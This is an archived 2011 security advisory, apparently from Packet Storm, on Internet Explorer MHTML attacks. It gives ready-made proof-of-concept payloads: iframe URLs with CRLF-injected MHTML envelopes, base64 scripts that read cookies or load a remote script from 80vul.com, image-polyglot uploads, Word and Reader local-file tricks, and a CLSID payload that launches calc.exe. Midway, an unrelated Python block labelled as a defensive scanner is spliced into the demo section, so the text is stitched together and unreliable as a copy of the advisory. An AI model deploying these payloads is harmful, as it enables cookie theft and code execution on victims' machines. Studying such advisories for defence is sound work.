Microsoft Internet Explorer MHTML Cross Site Scripting
2011-01-28T00:00:00
ID: PACKETSTORM:97980 | Type: packetstorm | Reporter: 80vul | Modified: 2011-01-28T00:00:00
Description
Hacking with mhtml protocol handler
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15
References: http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt
Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) was finally released yesterday. There are two articles about browser security [0x05 and 0x06]. If we combine both, we can complete a lot of interesting attacks...
1. Cross Site Scripting by uploading an mhtml file
Using the mhtml protocol handler, the file extension is ignored, so an attacker can rename the mhtml file to *.jpg, etc., and then upload it to the target site...
Of course, we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload file-format restrictions.
Then point an iframe's src at it:
<iframe src="MHTML:http://target-site.com/upfile/demo.html!cookie"></iframe>
2. Cross Site Scripting via mhtml-file string injection
The mhtml file format is based only on CRLF, so if we can inject CRLF, the site may be attacked.
PoC:
Please test it on a Win7 system.
<iframe src="mhtml:http://www.tudou.com/my/channel/item.srv?icode=enQCgQKJTDs&callback=Content-Type%3A%20multipart%2Frelated%3B%20boundary%3D_boundary_by_mere%0D%0A%0D%0A--_boundary_by_mere%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APGJvZHk%2BDQo8aWZyYW1lIGlkPWlmciBzcmM9Imh0dHA6Ly93d3cuODB2dWwuY29tLyI%2BPC9pZnJhbWU%2BDQo8c2NyaXB0Pg0KYWxlcnQoZG9jdW1lbnQuY29va2llKTsNCmZ1bmN0aW9uIGNyb3NzY29va2llKCl7DQppZnIgPSBpZnIuY29udGVudFdpbmRvdyA%2FIGlmci5jb250ZW50V2luZG93IDogaWZyLmNvbnRlbnREb2N1bWVudDsNCmFsZXJ0KGlmci5kb2N1bWVudC5jb29raWUpDQp9DQpzZXRUaW1lb3V0KCJjcm9zc2Nvb2tpZSgpIiwxMDAwKTsNCjwvc2NyaXB0PjwvYm9keT4NCg%3D%3D%0D%0A--_boundary_by_mere--%0D%0A!cookie"></iframe>
On Win XP or Win2k3, please URL-encode it a second time.
mhtml-file string injection in a JSON file: some sites restrict the JSON file's Content-Type to defend against XSS. Maybe we can use mhtml-file string injection to bypass it :)
3. Bypass X-Frame-Options
X-Frame-Options does not protect against the mhtml protocol handler.
The demo:
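As an added defensive example (not part of the advisory and not code from 80vul), the following Python covers sections 1 and 2 from the receiving side: it locates an MHTML multipart/related envelope anywhere inside an uploaded file regardless of extension or leading magic bytes and decodes its parts so a scanner can inspect them, and it applies a strict identifier allow-list to a JSONP callback name so CRLF and header-like text can never be reflected into a response. The sample inputs (a JPEG header with an appended envelope, as "copy /b" would produce, and a clean JPEG) are constructed here; function names are this example's own.

```python
import base64
import re

# Constructed sample inputs (not taken from the advisory).
JPEG_HEAD = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"\x00" * 32
POLYGLOT_UPLOAD = (
    JPEG_HEAD
    + b'\r\nContent-Type: multipart/related; boundary="b0"\r\n\r\n'
    + b"--b0\r\nContent-Location: cookie\r\n"
    + b"Content-Transfer-Encoding: base64\r\n\r\nPGh0bWw+\r\n--b0--\r\n"
)
CLEAN_UPLOAD = JPEG_HEAD + b"\x00" * 32 + b"\xff\xd9"

# The MHTML handler only has something to render if the bytes carry a
# multipart/related header with a boundary; the extension is irrelevant.
_MHTML_HEADER = re.compile(
    rb'content-type\s*:\s*multipart/related\b[^\r\n]*boundary\s*=\s*"?([^"\r\n;]+)',
    re.IGNORECASE,
)


def extract_mhtml_parts(data: bytes) -> dict:
    """Return {content_location: decoded_body} for every part of an MHTML
    envelope found anywhere in `data`; empty dict when there is none."""
    m = _MHTML_HEADER.search(data)
    if not m:
        return {}
    boundary = m.group(1).strip()
    parts = {}
    for chunk in data[m.end():].split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):  # "--boundary--" closes the envelope
            break
        head, _, body = chunk.partition(b"\r\n\r\n")
        headers = {}
        for line in head.splitlines():
            key, sep, value = line.partition(b":")
            if sep:
                headers[key.strip().lower()] = value.strip()
        location = headers.get(b"content-location", b"").decode("latin-1")
        if headers.get(b"content-transfer-encoding", b"").lower() == b"base64":
            try:
                body = base64.b64decode(body.strip())
            except ValueError:
                pass  # keep the raw bytes if the part is not valid base64
        parts[location] = body
    return parts


def looks_like_mhtml(data: bytes) -> bool:
    """Upload check: reject/quarantine any file that parses as MHTML."""
    return bool(extract_mhtml_parts(data))


# JSONP callback allow-list: dotted JavaScript identifiers only.
_SAFE_CALLBACK = re.compile(r"[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*")


def is_safe_callback(name: str, max_len: int = 64) -> bool:
    """True only if `name` is a plain identifier, so CRLF, spaces, colons and
    MIME-header text cannot reach the response body through it."""
    return len(name) <= max_len and _SAFE_CALLBACK.fullmatch(name) is not None


def render_jsonp(callback: str, payload_json: str) -> str:
    """Build a JSONP response, refusing any callback that fails the allow-list."""
    if not is_safe_callback(callback):
        raise ValueError("rejected callback name")
    return f"{callback}({payload_json});"


def find_crlf_header_injection(body: str) -> bool:
    """Detection for proxies/log review: a JSON or script response should
    never contain a CRLF followed by a multipart/related MIME header."""
    return re.search(r"\r\n[A-Za-z-]+\s*:\s*multipart/related", body, re.IGNORECASE) is not None


if __name__ == "__main__":
    print("polyglot upload flagged:", looks_like_mhtml(POLYGLOT_UPLOAD))
    print("decoded parts:", extract_mhtml_parts(POLYGLOT_UPLOAD))
    print("clean upload flagged:", looks_like_mhtml(CLEAN_UPLOAD))
    print(render_jsonp("jQuery.cb1", '{"ok":true}'))
```

The upload check deliberately searches the whole file rather than the first bytes, because the attack in section 1 relies on the envelope sitting after a valid image header; the callback check is an allow-list rather than a CRLF blacklist, so the second URL-encoding trick mentioned for XP/2k3 has nothing to bypass.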
<iframe src="mhtml:http://www.80vul.com/mhtml/zz.php!cookie"></iframe>
<iframe src="http://www.80vul.com/mhtml/zz.php"></iframe>
4. mhtml + file://uncpath + Adobe Reader 9 == local XSS vuln
Billy (BK) Rios introduced a very interesting approach to stealing local files at RuxCon/BayThreat (https://xs-sniper.com/blog/2010/12/17/will-it-blend/); it used "script src to local files in the LocalLow directory" via file:// + Java applet + Adobe Reader + Adobe Flash. With mhtml + file://uncpath it is much easier to do.
Demo:
Tested on win2k3 + IE8 + Adobe Reader 9
http://www.80vul.com/hackgame/xs-g0.php?username=Administrator
5. mhtml + file://uncpath + Word == local XSS vuln
Demo: http://www.80vul.com/mhtml/word.doc
Download it, save it as c:\word.doc and open it. You will get an alert with the contents of c:\boot.ini.
This is based on "Microsoft word javascript execution" (http://marc.info/?l=bugtraq&m=121121432823704&w=2).
To build the proof of concept, follow these steps:
1-Make an HTML file and paste in the XSS code
2-Open the HTML file with Word and save it as c:\word.xml
3-Open word.xml with Notepad and inject the mhtml code into <w:t>aaaaa </w:t>
4-Rename c:\word.xml to c:\word.doc
5-Open c:\word.doc
xss code
---------------------------------------------------------
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=http://www.80vul.com/hackgame/word.htm></OBJECT>
aaaaa
----------------------------------------------------------
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere--
*/
--------------------------------------------------------
If you use this vuln to attack someone, you need to know the path where Word saves the downloaded file; many users save to the desktop :)
"Microsoft word javascript execution" only works on Office 2k3 and 2k7. In other versions you can make a link with src pointing to http://www.80vul.com/hackgame/word.htm
Update
Of course, this approach may also work on other file types, e.g. *.pdf via app.launchURL()
6. Cross Zone Scripting
First we would like to mention a very old vulnerability:
<OBJECT CLASSID=CLSID:12345678-1234-4321-1234-111111111111 CODEBASE=c:/winnt/system32/calc.exe></OBJECT>
This vulnerability (by firebug9 [http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html]) allows you to execute any program in the "My Computer" zone. It has been tested and found to work on ie6/ie7/ie8 + win2k/winxp/win2k3.
Then repeat the steps of "5. mhtml + file://uncpath + Word == local XSS vuln" and change:
xss code
---------------------------------------------------------
<html><OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=mhtml:file://c:/word.doc!cookie></OBJECT>
aaaaa
----------------------------------------------------------
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere--
*/
--------------------------------------------------------
Thanks to d4rkwind (http://hi.baidu.com/d4rkwind/) for his excellent paper.
About Ph4nt0m Webzine
Ph4nt0m Webzine is a free network security magazine. We accept articles in English and Chinese; contributions are welcome.
Please mail root_at_ph4nt0m.org. Thank you!
Source: https://packetstormsecurity.com/files/97980/Microsoft-Internet-Explorer-MHTML-Cross-Site-Scripting.html
Original text: https://packetstormsecurity.com/files/download/97980/msiemhtml-xss.txt